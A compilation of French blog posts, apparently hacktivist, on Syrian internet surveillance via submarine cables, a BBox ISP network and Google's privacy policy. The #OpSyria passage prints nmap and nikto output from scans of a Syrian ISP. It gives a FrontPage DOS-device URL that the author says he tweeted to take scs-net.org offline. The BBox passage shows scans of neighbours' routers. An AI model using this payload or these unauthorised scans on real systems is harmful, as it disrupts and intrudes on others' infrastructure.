Puis, et c’est bien la le coeur de mon action, pour apporter des outils et des connaissances nécessaires à l’exercice de la liberté d’expression bafouée de ces internautes. Ceci passe par des outils d’anonymisation sur Internet et parfois, il est vrai, quelques prises de bec peu courtoises avec des “professionnels” qui mettent involontairement la vie de leurs sources en danger. Mais penser que nous faisons ça pour le plaisir de taper sur la presse est parfaitement inexact. C’est en revanche l’impression que ça peut laisser de l’extérieur, attendu que nous ne communiquons, que je ne communique pas sur toutes (nos) mes actions.

Mais par dessus tout, après 18 mois de conflit, il y a cette majorité silencieuse des “ni pour ni contre” qui se sent abandonnée par toute la communauté internationale, ce sont eux que nous n’avons pas le droit de laisser tomber, ce sont eux qui ont probablement besoin d’être considérés.

☠ Pourquoi le Parlement ?

C’est un symbole avant tout, derrière ce symbole, il y a un message informationnel, n’en déplaise à certains. Ce message, c’est d’offrir des données brutes, des accès à des comptes de dignitaires syriens. Le message est dual, il s’adresse au peuple syrien : “Des personnes surveillent vos surveillants”, et il s’adresse à la presse car nous offrons l’accès à des données brutes, factuelles, des correspondances, la capacité pour chacun s’il en a la curiosité de se faire sa propre opinion d’un conflit complexe.

Penser que nous agissons au doigt mouillé en fonction des like Facebook ou des hashtags Twitter est une erreur. Nous agissons pour le réseau, et non en fonction du réseau.

Syrie / Liban : dis moi avec qui tu t’interconnectes, je te dirai qui tu écoutes

Internet est un réseau public, basé sur des interconnexions entre opérateurs. Ces interconnexions sont libres, elles dépendent des infrastructures disponibles, donc des bonnes volontés ou des appétits commerciaux de sociétés ou d’institutions, souvent un savant mix des deux, des quatre. Il y a cependant un autre paramètre moins avouable : la doctrine militaire d’une nation en matière de SIGINT (Signal Intelligence, ou renseignement d’origine électromagnétique). Comme Internet est un réseau public, il est aisé de trouver des données concernant les interconnexions optiques assurant la connectivité internationale d’opérateurs ou de pays entiers. Ainsi, il est très simple, pour une personne un peu curieuse, de détecter les particularités de chacun.

On trouvera par exemple assez aisément les fibres optiques transatlantiques indispensables pour que Google et Youtube puissent assurer leurs services en Europe, on découvrira aussi la steppe numérique de Corée du Nord qui assure l’intégralité de son trafic Internet par le biais d’un satellite chinois, ou encore… la connectivité internationale de la Syrie. Mais qui surveille qui au juste ?

La toile

Les câbles sous-marin assurent une énorme partie du transit IP d’un continent à l’autre, d’un pays à l’autre. Il existe des cartes de ces câbles sous-marins, elles sont parfaitement publiques et nous allons voir que concernant la Syrie, elles nous donnent beaucoup d’informations.

La connectivité internationale de la Syrie est principalement assurée par 3 câbles sous-marins, pour une capacité de 11,2 Gbps.

Première information capitale, ces 3 câbles ont un landing point situé au même endroit, dans la ville de Tartous. Étrange coincidence, c’est dans cette ville que la Russie dispose d’une base navale. Des rumeurs insistantes voudraient que la famille al Assad y ait un temps trouvé refuge quand des affrontements se tenaient à Damas. Tartous est une ville côtière stratégique, probablement l’un des meilleurs endroits par lesquels Bachar al Assad pourraient envisager une sortie précipitée s’il trouvait à tout hasard une porte de sortie vers… la Russie.

Mais revenons à ce qui nous intéresse, c’est à dire ces 3 câbles sous-marin :

  • Le premier, UGARIT, d’une capacité de 1,2 Gbps, relie Tartous à Pentaskhinos (Chypres).
  • Le second, ALETAR, d’une capacité de 5Gbps, relie Tartous à Alexandrie (Égypte).
  • Le dernier, BERYTAR, luis aussi d’une capacité de 5Gbps, relie Tartous à Beyrouth (Liban).

BERYTAR a une particularité intéressante, il est une liaison directe et exclusive entre les deux pays. Pour Beyrouth, ce câble est “vital” en terme de connectivité puisque le seul autre câble sous-marin partant de la capitale libanaise et reliant Beyrouth à Pentaskhinos, dispose d’une capacité relativement anecdotique (0,622 Gbps) en comparaison de BERYTAR et de ses 5 Gbps. BERYTAR déssert également les villes libanaises de Saida et Trablous (source).

Les grandes oreilles waterproof… ou pas.

Pour qui veut écouter le trafic entier d’un pays, il faut commencer par créer des points de centralisation. Vous aurez compris que les landing points de transit IP des câbles sous-marin sont une pièce de choix pour qui veut jouer les Amesys en herbe. Où qu’ils se trouvent, particulièrement ceux qui désservent de grandes démocraties, comme, au pif les USA, ces câbles sous marins sont wiretapés, c’est à dire écoutés. Comme il est complexes, sur des très grosses liaisons, de traiter des interceptions en temps réel, les surveillants se retournent vers de l’interception basée sur des listes de mots clés, un peu sur le même principe qu’Echelon, mais en quand même un peu plus élaboré.

Aussi, on sait aujourd’hui surveiller sur ce type de liaisons un protocole particulier, comme Skype, ou des sites précis… comme Youtube. Nous avons publié sur reflets des éléments matériels attestant de cette surveillance. S’il peut s’averer complexe, voir impossible de décrypter toutes les communications Skype, il est en revanche d’une déconcertante simplicité d’identifier une connexion de l’un des deux FAI gouvernementaux syriens entre un opposant et une adresse IP appartenant à des plages IP de l’AFP. Vous comprendrez donc, à la lumière de ces éléments, la colère de certains d’entre nous (les barbus des Intertubes, pas du terrain) quand nous observons l’AFP, écrire en toutes lettres dans ses dépêches qu’elle contacte ses sources via Skype.

Ces dispositifs reposent sur une technologie bien de chez nous dont je vous rabat les oreilles depuis un bon moment, le Deep Packet Inspection, à l’origine destinés à assurer de la qualité de service, à “comprendre ce qu’il se passe sur un réseau” pour reprendre les termes d’Eric Horlait, co-fondateur de Qosmos. Le DPI, est, par extension, devenu l’arme numérique de prédilection de maintes dictatures pour traquer des opposants… ce grâce à l’éthique en toc de quelques entreprises comme Amesys, Cisco, et beaucoup d’autres. D’abord pour de l’écoute légale, en ciblant un certain nombre de connexions, puis, comme le préconise Amesys dans ses brillants exposés, en écoutant l’ensemble des communications d’un pays, en les enregistrant dans une base de données, puis en procédant par extraction.

Quand on est une puissance étrangère et que l’on a pas un accès direct aux landing points assurant la connectivité internationale du pays que l’on veut écouter, on peut par exemple, disposer de navires d’interception dotés de capacités d’écoute des câbles sous-marin. La France dispose de ce type de navire.

Dupuy-de-Lôme, navire collecteur de renseignements d’origine électromagnétique de la Marine nationale française (Source Wikipedia)

La France dispose également d’un autre atout, elle déploie et exploite certains de ces câbles, et certains d’entre eux ont une desserte stratégique, comme par exemple, le récent EIG (Europe India Gateway), en blanc sur la carte ci-dessous, et ses 14 landing points. EIG a été déployé par Alcatel Lucent, et en ce qui me concerne j’ai un peu de mal à croire que l’entreprise franco-américaine ne s’est pas assurée quelques sales blanches dans des landing points bien situés pour être en mesure d’intercepter de manière ciblée une partie du trafic.

L’interception des communications sur les liaisons sous-marines n’est que l’une de la demi douzaine de disciplines que compte le SIGINT. Elle s’avère souvent délicate pour une seule raison : les importants débits de certaines de ces liaisons offrent trop d’informations qu’il devient alors complexe de traiter en temps réel. Aujourd’hui des sondes qui opèrent de l’interception en profondeur de paquets savent écouter des liaisons d’un débit de 100 Gbps. Ensuite, ce n’est qu’une question de capacité de traitement, mais pour cette problématique du traitement, les architectures sont scalables, ce n’est donc pas un frein technologique, il suffit d’y mettre les moyens.

Qui écoute qui ?

BERYTAR est un câble appartenant à 3 entités :

  • Le Ministère des Télécom libanais à hauteur de 46.875 %
  • Le Syrian Telecom Establishment (STE) à hauteur de 46.875 %
  • Arento (Espagne) à hauteur de 6.25 %

Les gens de la STE sont des gens assez sympas, nous allons le voir, qui sous-traitent leurs basses besognes à des entreprises locales qui prétendent faire de la sécurité informatique. Quand on jette un oeil à leur timeline Twitter, on comprend vite ce à quoi ils passent leur temps, la sécurité en question, c’est plutôt de la surveillance qu’autre chose.

Nous savons que le régime syrien a, à maintes reprises, marqué sa volonté de contrôler Internet à des fins de surveillance et de contrôle de l’information : empêcher les activistes d’envoyer des vidéos ou même d’empêcher l’utilisation de solutions d’anonymisation des flux Internet afin de mieux localiser les opposants. OpenVPN est par exemple totalement inopérant en Syrie (notamment grâce à Fortinet), les activistes doivent se tourner vers le réseau TOR, bien plus compliqué à bloquer.

Les réfugiés syriens en Jordanie, en Turquie ou au Liban sont ils en sécurité ? Peuvent-ils communiquer librement ? La réponse courte est :

non, et tout particulièrement au Liban

BERYTAR, le seul tuyau qui relie le Liban à la Syrie est d’une capacité idéale pour réaliser des interceptions globales en temps réel en utilisant de l’inspection en profondeur de paquets (DPI). Si Qosmos dit vrai et qu’il s’est finalement retiré du consortium européen pour le projet ASFADOR, le régime syrien a probablement trouvé, ou trouvera une autre entreprise pour le mettre en place.

Attention, cette information vaut pour TOUS les journalistes qui travaillent depuis les “bases arrières” et se pensent, eux et leurs sources en sécurité. Communiquer avec la Syrie implique donc 2 choses :

  1. le chiffrement des données afin que les autorités syriennes ne puissent pas lire le contenu des communications
  2. l’anonymisation des flux afin que les autorités syriennes ne puissent pas identifier émetteurs et récepteurs.

Tout journaliste qui ne procède pas à ces deux précautions met sa vie et celle de sa source en danger.

BBox Fibre by Numéricable… smells like p0wn4ge

Il y a quelques temps de cela, je vous avais raconté la belle histoire de Sam Synack et de la compromission totale de plusieurs millions de Neufbox. Certes, celle que je vais vous raconter aujourd’hui est moins spectaculaire, mais gageons que ce n’est que par manque de temps. Quand j’ai aménagé dans mon dernier appartement que j’ai voulu et choisi dans un périmètre de moins de 100m du NRA le plus proche, j’ai eu la mauvaise surprise de découvrir que ma ligne était raccordée sur un autre NRA, beaucoup plus loin et que ma dite ligne accusait une atténuation théorique de 82db. La bête, pas folle, avait choisi un immeuble câblé… enfin câblé. Avec des prises pas aux normes, problème que Numericable n’a jamais su détecter et que le technicien Bouygues a finalement refait de A à Z, surpris qu’il était que j’arrive à pinguer le premier routeur avec ce modem Castlenet backdooré et dont le wifi se couche dés qu’il prend 20 flux nntp dans la tête. Vous ferez une expérience sympa si vous êtes chez Numericable, quand le net tombe, scannez votre réseau, vous aurez la petite surprise de découvrir une interface de votre modem non documentée… et faillible.
Ce qui m’amène aujourd’hui ce n’est pas vraiment Numéricable… enfin si en fait, vu que les Bouygues Box vendues pour des “BBox fibres” sans port optique et qui n’ont strictement rien à voir avec de la fibre (oui c’est clairement de la pub mensongère, un peu comme si je disais que ma connexion RTC est une connexion fibre puisqu’elle passe par une fibre transatlantique quand je tweete),  sont en fait connectées au réseau de Numéricable. Bouygues n’opère donc pas son propre réseau.
L’histoire commence comme d’habitude assez banalement, je cherche sur l’interface de la BBox le moyen de rentrer mes propres DNS pour que tous mes équipements puissent en profiter sans avoir à me taper tous les hosts files de mes machines.Et bien sachez qu’une telle interface n’existe pas sur les BBox, ce qui est tout bonnement inadmissible.
Une interface a cependant attiré mon attention, c’est celle des caractéristiques techniques de la ligne câble. On y découvre une IP LAN en 10.x.x.x. Il s’agit en fait de l’IP de votre BBox sur le LAN de Numéricable.. Elle vient donc en sus de votre IP publique et de l’IP sur votre LAN à vous (celle en 192.168.x.x).
Cette ip est accessible dans les caractéristiques de ligne, sans aucune authentification… ce qui est bien mais franchement pas top monsieur BouyguesBox Fibre Canada Dry. Vous voulez que je vous montre pourquoi ?
Avec mon ordinateur j’essaye de pinguer le voisin
$ ping 10.109.88.18
PING 10.109.88.18 (10.109.88.18): 56 data bytes
Request timeout for icmp_seq 0
36 bytes from border1.ge1-4.giglinx-17.sje003.pnap.net (66.151.157.225):
Destination Host Unreachable
Vr HL TOS Len ID Flg off TTL Pro cks Src Dst
 4 5 00 5400 3a8d 0 0000 3c 01 d4ff 10.8.2.150 10.109.88.18
Request timeout for icmp_seq 1
Request timeout for icmp_seq 2
Request timeout for icmp_seq 3
Request timeout for icmp_seq 4
Request timeout for icmp_seq 5
--- 10.109.88.18 ping statistics ---
7 packets transmitted, 0 packets received, 100.0% packet loss
… Ça ne passe pas, rien de plus normal, on voit ce que ça donne avec nmap pour dire bonjour au voisin :
$ sudo nmap -sS 10.109.88.17 10.109.88.18
Password:

Starting Nmap 5.51 ( http://nmap.org ) at 2012-03-21 00:55 CET
Nmap scan report for 10.109.88.17
Host is up (0.033s latency).
Not shown: 997 closed ports
PORT STATE SERVICE
25/tcp filtered smtp
554/tcp open rtsp
7070/tcp open realserver

Nmap scan report for 10.109.88.18
Host is up (0.32s latency).
Not shown: 991 closed ports
PORT STATE SERVICE
22/tcp filtered ssh
23/tcp filtered telnet
25/tcp filtered smtp
80/tcp filtered http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open rtsp
7070/tcp open realserver
La box du voisin vient de me répondre… et ça, ça commence à être déjà plus surprenant. On va lui demander de se présenter un peu plus en détail.
$ sudo nmap -sS 10.109.88.17 -A 10.109.88.18

Nmap scan report for 10.109.88.18
Host is up (0.13s latency).
Not shown: 991 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
23/tcp filtered telnet
25/tcp filtered smtp
80/tcp filtered http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open tcpwrapped
7070/tcp open tcpwrapped

Network Distance: 3 hops

TRACEROUTE (using port 3306/tcp)
HOP RTT ADDRESS
- Hop 1 is the same as for 10.109.88.17
2 624.42 ms 10.109.64.1
3 503.04 ms 10.109.88.18
Tiens, le Traceroute nous en apprend une bien bonne, nous avons un invité mystère sur 10.109.64.1… on va donc voir ce qu’il nous raconte
$ sudo nmap -sS 10.109.88.17 -A 10.109.64.1

Nmap scan report for 10.109.64.1
Host is up (0.18s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
23/tcp filtered telnet
25/tcp filtered smtp
554/tcp open tcpwrapped
2126/tcp open cops Common Open Policy Service (COPS)
7070/tcp open tcpwrapped
No exact OS matches for host (If you know what OS is running on it, see http://nmap.org/submit/ ).

Network Distance: 2 hops
Service Info: Host: ORL1CC

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
- Hop 1 is the same as for 10.109.88.17
2 525.31 ms 10.109.64.1
Notre invité mystère est donc monsieur QoS. C’est donc la machine à DDoSSer si vous êtes en LowID sur Emule. Le /24 révèle des choses pas toujours très jolies jolies, il semble que quelques box soient carrément en mode open bar…
Nmap scan report for 10.109.64.243
Host is up (0.037s latency).
Not shown: 990 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
23/tcp filtered telnet
25/tcp filtered smtp
80/tcp filtered http
135/tcp filtered msrpc
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds
554/tcp open tcpwrapped
5000/tcp open upnp?
7070/tcp open tcpwrapped
Mais il y a plus inquiétant… A votre avis, il se passe quoi si on dump les paquets pendant une mise à jour de la BBox ? Je n’ai pas tenté le coup pour tout vous avouer. Mais tout ceci ne m’inspire pas franchement confiance, j’ai l’impression d’avoir vu des trucs un peu plus solides que ça niveau réseau d’un FAI.

Social DDoS : merde on a perdu Bachar #OpSyria

Previously dans OpSyria : Il a quelques jours, nous dévoilions sur Reflets quelques photos de vacances de notre dernier séjour en Syrie. Nous sommes tombés sur une bonne dizaine de machines que nous suspections d’avoir été mises en place l’été dernier par l’italien Area Spa, ce peu avant qu’il se fasse prendre la main dans le pot confiture par Bloomberg. Il a depuis, semble t-il dénoncé le contrat, ce qui n’empêche pas les appliances qui opèrent la censure en Syrie de ronronner. Le souci des admins de Bachar, c’est qu’ils sont pas supers doués. En fait c’est même de belles quiches.

 

En jouant un peu avec un proxy BlueCoat de la Syrian Computer Society, je me suis rendu compte d’un phénomène paranormal. Je me mets à causer à cette machine. Elle m’explique que que comme tous les vendredi soirs chez Bachar, c’est happy hour sur certains ports :
Interesting ports on 77.44.210.6:
 Not shown: 979 closed ports
 PORT STATE SERVICE
 22/tcp filtered ssh
 23/tcp filtered telnet
 80/tcp open http
 81/tcp open hosts2-ns
 135/tcp filtered msrpc
 139/tcp filtered netbios-ssn
 443/tcp open https
 514/tcp open shell
 1720/tcp filtered H.323/Q.931
 1723/tcp filtered pptp
 2000/tcp filtered callbook
 3128/tcp open squid-http
 4444/tcp filtered krb524
 5060/tcp filtered sip
 8000/tcp open http-alt
 8008/tcp open http
 8080/tcp open http-proxy
 8081/tcp open blackice-icecap
 8088/tcp open unknown
 8090/tcp open unknown
 9090/tcp open zeus-admin
Alors pour rigoler je suis allé faire un tour là dessus : http://77.44.210.6:8090/. Et comme avec certains autres ports, me voilà téléporté sur cette URL : http://scs-net.org/files/index.html IP 213.178.225.50). Sans avoir l’oeil super exercé, on se dit que dans ce petit répertoire “files”, il est possible qu’on trouve des trucs amusants… ce ne serait pas la première fois. On serait curieux pour moins non ? Notez que le site SCS-NET est celui d’un fournisseur d’accès un peu spécial en Syrie. Créé par Bachar El Assad lui même, il concentre les l33tz de la t34m D4m45… ouais ça fout la trouille. Mais attendez y’a encore plus flippant.

 ---------------------------------------------------------------------------
 + Target IP: 213.178.225.50
 + Target Hostname: scs-net.org
 + Target Port: 80
 + Start Time: 2012-03-10 17:38:20
 ---------------------------------------------------------------------------
 + Server: Microsoft-IIS/6.0
 - Root page / redirects to: /portal/
 + No CGI Directories found (use '-C all' to force check all possible dirs)
 + Microsoft-IIS/6.0 appears to be outdated (4.0 for NT 4, 5.0 for Win2k, current is at least 7.0)
 + Retrieved X-Powered-By header: ASP.NET
 + Retrieved microsoftofficewebserver header: 5.0_Pub
 + Retrieved x-aspnet-version header: 2.0.50727
 + Uncommon header 'microsoftofficewebserver' found, with contents: 5.0_Pub
 + Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
 + Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
 + OSVDB-396: /_vti_bin/shtml.exe: Attackers may be able to crash FrontPage by requesting a DOS device, like shtml.exe/aux.htm -- a DoS was not attempted.
 + OSVDB-3233: /postinfo.html: Microsoft FrontPage default file found.
 + OSVDB-3092: /guest/: This might be interesting...
 + OSVDB-3233: /_vti_inf.html: FrontPage is installed and reveals its version number (check HTML source for more information).
 + OSVDB-3500: /_vti_bin/fpcount.exe: Frontpage counter CGI has been found. FP Server version 97 allows remote users to execute arbitrary system commands, though a vulnerability in this version could not be confirmed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-1376. http://www.securityfocus.com/bid/2252.
 + OSVDB-67: /_vti_bin/shtml.dll/_vti_rpc: The anonymous FrontPage user is revealed through a crafted POST.
 + 3818 items checked: 13 item(s) reported on remote host
Vous ne rêvez pas ! Un FAI sous FrontPage ! Et un FAI qui hoste le dispositif de censure nationale ! Elle est pas belle la vie ? Du coup, juste pour rigoler j’ai tweeté cette URL : http://scs-net.org/_vti_bin/shtml.exe/aux.htm … et il semble que depuis, le site expérimente quelques petits désagréments, il est injoignable depuis presqu’une heure.

 

Chers admins Frontpage de la SCS, soyez forts dans votre tête, rallumez nous vite ce serveur j’en ai encore 3 ou 4 à tweeter… bisous !

De la polémique Google sur la vie privée

Il y a des jours comme ça où on se dit, après la lecture d’un billet, et puis d’un autre… qu’après tout, on devrait laisser tomber les combats que l’on juge importants. J’ose cependant croire qu’il s’agissait pour le premier d’un billet totalement irréfléchi, mal inspiré et surtout pas du tout documenté. Un billet, gentiment benêt, et donc excusable. Pour le second, j’ose espérer qu’il s’agit d’un billet autocentré sur le nombril de son auteur, lui aussi non réfléchi et non documenté… soit. Sauf qu’il est tout de même compliqué de ne pas réagir.

 

Au coeur de la pseudo polémique, la collecte et l’exploitation des données personnelles collectées par Google. Tout le Net en parle, la presse y compris, on peut lire un peu de tout et surtout beaucoup de n’importe quoi. Il est toujours délicat de causer de Google. J’admire les personnes qui sont capables d’élaborer une reflexion sur un sujet aussi complexe et se forger leur opinion en une vingtaine de lignes, sans même avoir lu ce que Google dit collecter, ce qu’il en fait, ni souvent d’ailleurs sans connaitre les services proposés par ce qui ressemble de plus en plus à l’étoile noire des données personnelles.

 

Même si l’on fait preuve d’un esprit de synthèse brillant, qu’on pense connaitre Google de A à Z parce qu’on utilise Gmail et Youtube, la question des données personnelles et de la protection de la vie privée méritent une réflexion un tantinet plus poussée.

 

Google est un univers

Il fut une époque où une immense majorité d’utilisateurs d’Internet assimilaient dans leur inconscient l’icône d’Internet Explorer, le navigateur de Microsoft à Internet. Quand vous demandiez à une personne au téléphone de lancer son navigateur, elle vous faisait un long “heeeeiiiiiiiiiinn” et vous finissiez par craquer en lui disant “le E bleu d’Internet », il s’en suivait un “aaaaahhhh” soulagé quasi systématique.

 

Dans l’inconscient de ces internautes (souvent les mêmes, mais toujours une majorité), aujourd’hui Internet = Google. C’est le premier point de contact visuel après le lancement du navigateur. C’est un univers dans lequel des centaines de millions de personne évoluent tous les jours, parfois même sans s’en rendre vraiment compte. Ces internautes :
  • font des recherches sur Internet et de plus en plus souvent avec le navigateur de Google, Chrome;
  • consultent les actualités sur Google News ;
  • lisent leur mail dans Gmail ;
  • regardent des vidéos sur Youtube ;
  • partagent leurs photos de famille sur Picasa ;
  • supertweetpokent de manière géolocalisée sur Google+ ;
  • préparent leurs vacances sur Google Map ;
  • se guident grâce à Google Street View ;
  • téléphonent avec Google Voice, quand ce n’est pas depuis leur téléphone Android ;
  • regardent la TV avec GoogleTV ;
  • écoutent de la musique sur Google Music ;
  • … arrêtons nous ici, la liste des services proposés par Google est interminable.

Un univers qui reste une partie d’Internet

Google n’est pas qu’un moteur de recherche, c’est un univers et c’est un univers, qui contrairement à AOL en son temps a réussi à trouver un juste équilibre pour retenir les utilisateurs, tout en les laissant sur Internet. Ceux qui ont connu AOL comprennent surement de quoi je parle, ce n’est probablement pas le cas pour les plus jeunes, sachez simplement que si aujourd’hui AOL est mort, c’est parce qu’il contraignait ses utilisateurs à accéder à une sorte de gros intranet, ce, exclusivement depuis son navigateur propriétaire, inclus dans son kit de connexion, indispensable pour accéder à cet ersatz d’Internet.

 

Si Google et ses services venaient à “s’éteindre” brutalement, Internet fonctionnerait toujours. En revanche, la majorité des internautes seraient perdus. Ils perdraient des points de repère et devraient se formaliser avec l’utilisation de plein de services, non unifiés sous un logo, une ergonomie, une cohérence.

 

Pour de nombreuses entreprises en revanche, les effets seraient bien plus gênants. Quand Google change son algorithme de positionnement pour afficher ses résultats de recherche, certains e-commerçants très bien positionnés sur une recherche donnée se retrouvent subitement 4 ou 5 pages plus loin sur des produits qui généraient une grosse partie de leur chiffre d’affaires. C’est quelque chose dont je m’étais amusé sur Reflets, de manière un peu méchante. Google a un impact énorme sur le chiffre d’affaires des e-commerçants.

 

Gratuit… en échange de votre vie privée

Google propose des services gratuits pour l’usage couvrant de nombreux besoins des particuliers. Cette gratuité pour le grand public de la quasi intégralité de ses services, leur caractère plus que confortable en terme de volume, d’ergonomie ou de simplicité d’accès sont très appréciés, et à juste titre. Mais la gratuité n’existant, pas, Google a pour modèle économique de financer cette gratuité grâce à sa régie publicitaire Google Ads.

 

Toute la polémique qui agite tant le Net aujourd’hui, porte sur 2 points :

 

  • La premier, médiatiquement le plus anecdotique, concerne une partie de Google Ads, le Google Display Network, les display ads étant l’un des 5 produits d’affichage des publicités de Google. Les 4 autres sont les Search Ads, les Video & YouTube Ads, les TV Ads et le Mobile Ads. La brouille oppose Apple à Google, le premier reprochant au second d’avoir contourné des dispositifs normés du navigateur web d’Apple, Safari, ainsi que ceux d’IOS, son système d’exploitation embarqué que l’on retrouve sur ses téléphones (iPhone) et ses tablets (iPad). Nous ne nous attarderons pas sur ce point, pour éviter de partir dans des considérations trop techniques.
  • Le second concerne le changement de règles de confidentialité des services de Google qui entrait en vigueur hier, le 1er mars. Pour faire très simple au risque de faire simpliste, Google va maintenant s’octroyer le droit de consolider les données qu’il collectait de manière indépendante sur ses divers services. Il ne collecte dans les faits pas plus d’informations qu’avant, mais il les centralise, et donc peut avoir plus de facilités à les croiser.

 

On peut dater assez précisément le début de l’évolution de la politique de confidentialité de Google, il s’agit de l’arrivée de Google+. À l’instar de Facebook, Google+ est un service trop complexe pour que les règles de confidentialité soient simples. Nous allons voir qu’il s’agit d’un service qui en regroupe de nombreux autres, et qui donc par définition, cumule un nombre effarant de données collectées, consolidées par défaut, et rattachées, à un compte… nominatif.

 

Le business des données personnelles

Quand on parle de données personnelles, on aime distinguer :
  • La collecte des données ;
  • Le traitement des données (processing) ;
  • L’utilisation des données (exploitation) ;
  • La durée de conservation des données (rétention).

Les données collectées

Google est plutôt transparent sur les données qu’il collecte pour qui se donne la peine de lire de quoi il en retourne. Il y a quand même une limite par rapport à cette transparence, c’est que pour beaucoup d’utilisateurs, tout ceci demeure du charabia technique, bien peu parlant. Voici par exemple ce que Google collecte sur un utilisateur de son service Google Music. Il s’agit d’un exemple particulièrement intéressant qui donne bien l’étendue du degré de connaissance que Google peut avoir sur ses utilisateurs

google privacy datas collected

Le moins que l’on puisse dire, c’est que ça fait beaucoup. Ça fait beaucoup, mais Google vous le dit, et certains ne prennent pas cette peine, y compris en France. On peut donc reprocher la masse d’informations que Google accumule et il faut comprendre que ceci est grandement une conséquence du nombre de services qu’il propose. Mais il va être compliqué de lui reprocher son manque de transparence sur la question.

 

Autre point de reproche lié à la collecte, et même en amont, il s’agit du point relatif à l’identification aux services. Il s’agit d’une authentification unifiée : un identifiant et un mot de passe vous donnent accès à l’ensemble des services de Google, il est rarement besoin (sauf dans le cas d’une acquisition récente) d’avoir à se créer un compte pour accéder à un nouveau service de Google. Votre identifiant, vous le savez, c’est une adresse email Gmail, bien pratique pour son caractère par nature unique.

 

Le traitement et l’utilisation des données

La nature des services proposés par Google (en ligne), fait que l’entreprise ne distinguera pas, ou dans de rares cas, traitement et exploitation. Le traitement à proprement parlé est automatisé et instantané. C’est de ce traitement dont découle ensuite la démarche commerciale de Google. En clair, c’est de là qu’il tire ses bénéfices. Et là en revanche il faut bien comprendre que Google dispose de bien des manières d’exploiter, directement ou indirectement vos données. Dans le cadre d’une exploitation directe, Google les utilisera pour  “fournir, maintenir, protéger  ou améliorer ses propres services“. Il pourra aussi se servir de ces données pour développer de nouveaux services. Le point relatif à la protection des services est à mon sens très intéressant mais il est bien trop technique pour le traiter dans ce billet, il en mériterait un à lui seul.

 

Il est également à noter que Google propose à ses utilisateurs des outils lui permettant un certain contrôle sur ce qu’il partage comme données, je cite :
  • Review and control certain types of information tied to your Google Account by using Google Dashboard.
  • View and edit your ads preferences, such as which categories might interest you, using the Ads Preferences Manager. You can also opt out of certain Google advertising services here.
  • Use our editor to see and adjust how your Google Profile appears to particular individuals.
  • Control who you share information with.
  • Take information out of many of our services.
Vos activités sur Google font ce que vous attendez d’elles, mais parfois elles en font aussi un peu plus. Vous avez tous eu un jour où l’autre à utiliser reCaptcha, un outil racheté par Google, que tout le monde pense être une simple protection antispam. Et bien vous ne le saviez peut être pas, mais en plus d’être une solution antispam, reCaptcha a été utilisé par Google afin d’améliorer ses performances en matière de reconnaissance de caractères (OCR) dans le cadre de son titanesque projet de numérisation de livres, Google Books, ainsi que les anciens numéros du New-York Times.

 

La rétention de données

C’est le second point de notre bref exposé qui pourrait avoir de quoi sérieusement nous fâcher. Dans cet article d’Arstechnica, on découvrira que selon le site, Google se sent investis d’une mission : “apprendre des bonnes personnes pour combattre les mauvaises personnes“… et ça, il y a vraiment de quoi trouver ça effrayant, surtout dit comme ça, en dehors de tout contexte.

 

La réalité en fait assez duale, ce n’est ni tout blanc, ni tout noir. Cependant la durée de conservation de certaines données est illimitée. La commission européenne a demandé à Google d’anonymiser les données relatives aux recherches, c’est ce que Google fait plus ou moins en supprimant le dernier octet de l’adresse IPau bout de 6 mois. Mais lorsque l’on parle d’anonymisation, on se doute bien que cette mesure est loin d’être suffisante. Le dernier octet effacé sur les IP ayant servi à faire des recherches ne suffiront certainement pas à anonymiser, au sens de garantir l’anonymat de l’internaute. Ces données pouvant être corrélées à d’autres services il sera toujours très simple de les rattacher à un compte Gmail, des historiques de chat, et donc obtenir l’identification de la personne, même si cette dernière a changé entre temps d’IP. On peut donc estimer que Google conserve ces données à vie et qu’il a en outre le loisir de les croiser avec beaucoup d’autres : carnets d’adresse, vidéo regardées sur Youtube, bibliothèque musicale de Google music ou encore déplacements via l’API de google maps avec des produits tels que Latitude. Données non anonymisées… rétention à vie… exploitation commerciale, dont la revente ou le partage à des tiers (avec votre consentement, pour peu que vous preniez la peine de lire ce que Google vous propose quand vous souscrivez à ses services)… vous commencez peut être à mieux comprendre le problème.

 

“Même pas peur j’ai rien à me reprocher”

C’est ici une réflexion qui m’agace au plus haut point, l’argument des personnes qui n’ont aucune compréhension des problématiques de la gestion de données personnelles à caractère nominatif. C’est typiquement le cas de l’auteur de ce billet qui n’a d’ailleurs probablement jamais lu ce que que Google conserve comme données sur lui, et encore moins combien de temps il les garde ou ce qu’il se réserve le droit d’en faire. C’est au bas mot triste pour lui, mais il est surtout parfaitement inconscient de véhiculer l’idée que “après tout ce n’est pas grave puisque je n’ai rien à me reprocher“.

 

Et dans ce domaine, la palme de la bêtise revient à ce billet, techniquement parfaitement faux. Je cite : “Je pense que notre ISP en sait encore plus que google, tout comme nos opérateurs mobiles et là on ne dit rien? Si vous avez un package complet chez SFR (tv, téléphone, internet), toutes vos données passent dans le même tuyau.“. La comparaison avec un fournisseur d’accès à Internet en France est nulle et non avenue. Un fournisseur d’accès est régi par certaines lois, comme le Code des Postes et communications électroniques et surtout l’article 226-15 du code pénal. Pour les comprendre, il faut encore une fois distinguer le métier d’un FAI : acheminer vos communications, et les principes relatifs aux données personnelles que j’ai cité plus haut :
  • La collecte des données ;
  • Le traitement des données (processing) ;
  • L’utilisation des données (exploitation) ;
  • La durée de conservation des données (rétention).
Un FAI a une obligation légale de conservation, pendant une période donnée, de journaux de connexion. Ces derniers ne visent qu’à une seule chose : mettre un nom derrière une adresse IP à un instant T en cas de réquisition judiciaire. Il existe ensuite une exception, il s’agit de l’interception légale, qui permet aux FAI, sur demande expresse des autorités judiciaires, de procéder à des écoutes dites légales, c’est à dire des interceptions des vos communications qui seront soumises à un régime spécial de rétention.

 

